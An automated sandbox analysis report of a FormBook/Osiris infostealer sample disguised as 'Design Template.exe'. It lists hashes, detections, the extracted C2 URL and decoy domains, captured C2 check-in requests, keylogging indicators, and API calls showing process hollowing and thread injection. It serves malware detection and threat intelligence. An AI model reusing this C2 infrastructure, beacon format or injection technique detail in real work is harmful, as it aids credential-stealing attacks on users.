Analysis Report Design Template.exe

Overview

General Information

Sample Name: Design Template.exe
Analysis ID: 385453
MD5: 56d56566623a2bc942141b56f9dd3da5
SHA1: bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256: 5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
Tags: exe
Most interesting Screenshot:

Detection

Osiris FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Osiris Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Design Template.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}
Multi AV Scanner detection for submitted file
Source: Design Template.exe Virustotal: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Design Template.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.2.rundll32.exe.7b4cd8.1.unpack Avira: Label: TR/Patched.Gen
Source: 14.2.rundll32.exe.4997960.5.unpack Avira: Label: TR/Patched.Gen

Compliance:

Uses 32bit PE files
Source: Design Template.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop ebx 14_2_004F6A98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_005062A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_004FC3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_00505672

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.zq2003.com/ma3c/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/OnlyDomains" target="_blank" rel="nofollow" title="OnlyDomains Facebook"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: www.modomo.amsterdam
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 12:42:39 GMTServer: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9aContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:wght
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/onlydomains
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.trustpilot.com/review/onlydomains.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042CCDA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 2_2_0042CCDA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042E537 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 2_2_0042E537

E-Banking Fraud:

Detected Osiris Trojan
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp Jump to dropped file
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434168 NtCreateFile, 2_2_00434168
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043816D NtTerminateProcess, 2_2_0043816D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A3B8 NtCreateFile,NtCreateSection,NtMapViewOfSection, 2_2_0043A3B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A5B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 2_2_0043A5B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434678 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 2_2_00434678
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004356B8 NtWriteFile,NtCreateSection,NtClose, 2_2_004356B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00433FF8 NtAllocateVirtualMemory, 2_2_00433FF8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434798 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043501A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_0043501A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434D27 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_00434D27
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_00A498F0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_00A49860
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49840 NtDelayExecution,LdrInitializeThunk, 4_2_00A49840
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A499A0 NtCreateSection,LdrInitializeThunk, 4_2_00A499A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_00A49910
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A20 NtResumeThread,LdrInitializeThunk, 4_2_00A49A20
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_00A49A00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A50 NtCreateFile,LdrInitializeThunk, 4_2_00A49A50
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A495D0 NtClose,LdrInitializeThunk, 4_2_00A495D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49540 NtReadFile,LdrInitializeThunk, 4_2_00A49540
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_00A496E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_00A49660
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_00A497A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49780 NtMapViewOfSection,LdrInitializeThunk, 4_2_00A49780
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49FE0 NtCreateMutant,LdrInitializeThunk, 4_2_00A49FE0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49710 NtQueryInformationToken,LdrInitializeThunk, 4_2_00A49710
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A498A0 NtWriteVirtualMemory, 4_2_00A498A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49820 NtEnumerateKey, 4_2_00A49820
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4B040 NtSuspendThread, 4_2_00A4B040
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A499D0 NtCreateProcessEx, 4_2_00A499D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49950 NtQueueApcThread, 4_2_00A49950
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A80 NtOpenDirectoryObject, 4_2_00A49A80
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A10 NtQuerySection, 4_2_00A49A10
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A3B0 NtGetContextThread, 4_2_00A4A3B0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49B00 NtSetValueKey, 4_2_00A49B00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A495F0 NtQueryInformationFile, 4_2_00A495F0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49520 NtWaitForSingleObject, 4_2_00A49520
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4AD30 NtSetContextThread, 4_2_00A4AD30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49560 NtWriteFile, 4_2_00A49560
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A496D0 NtCreateKey, 4_2_00A496D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49610 NtEnumerateValueKey, 4_2_00A49610
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49670 NtQueryInformationProcess, 4_2_00A49670
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49650 NtQueryValueKey, 4_2_00A49650
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49730 NtQueryVirtualMemory, 4_2_00A49730
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A710 NtOpenProcessToken, 4_2_00A4A710
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49760 NtOpenProcess, 4_2_00A49760
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A770 NtOpenThread, 4_2_00A4A770
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49770 NtSetInformationFile, 4_2_00A49770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9540 NtReadFile,LdrInitializeThunk, 14_2_044C9540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C95D0 NtClose,LdrInitializeThunk, 14_2_044C95D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9650 NtQueryValueKey,LdrInitializeThunk, 14_2_044C9650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_044C9660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C96D0 NtCreateKey,LdrInitializeThunk, 14_2_044C96D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C96E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_044C96E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9710 NtQueryInformationToken,LdrInitializeThunk, 14_2_044C9710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9FE0 NtCreateMutant,LdrInitializeThunk, 14_2_044C9FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9780 NtMapViewOfSection,LdrInitializeThunk, 14_2_044C9780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9840 NtDelayExecution,LdrInitializeThunk, 14_2_044C9840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C9860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_044C9860
